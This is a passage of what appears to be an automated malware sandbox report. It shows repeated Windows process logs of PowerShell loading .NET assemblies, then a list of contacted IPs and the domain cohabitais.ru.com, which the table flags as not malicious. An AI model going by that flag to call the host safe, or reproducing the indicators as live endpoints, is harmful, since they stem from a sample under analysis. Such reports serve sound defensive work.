Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.83.194.50
 cohabitais.ru.com United States
132335 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN false
23.218.208.109
 unknown United States
6453 AS6453US false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
cohabitais.ru.com 103.83.194.50 true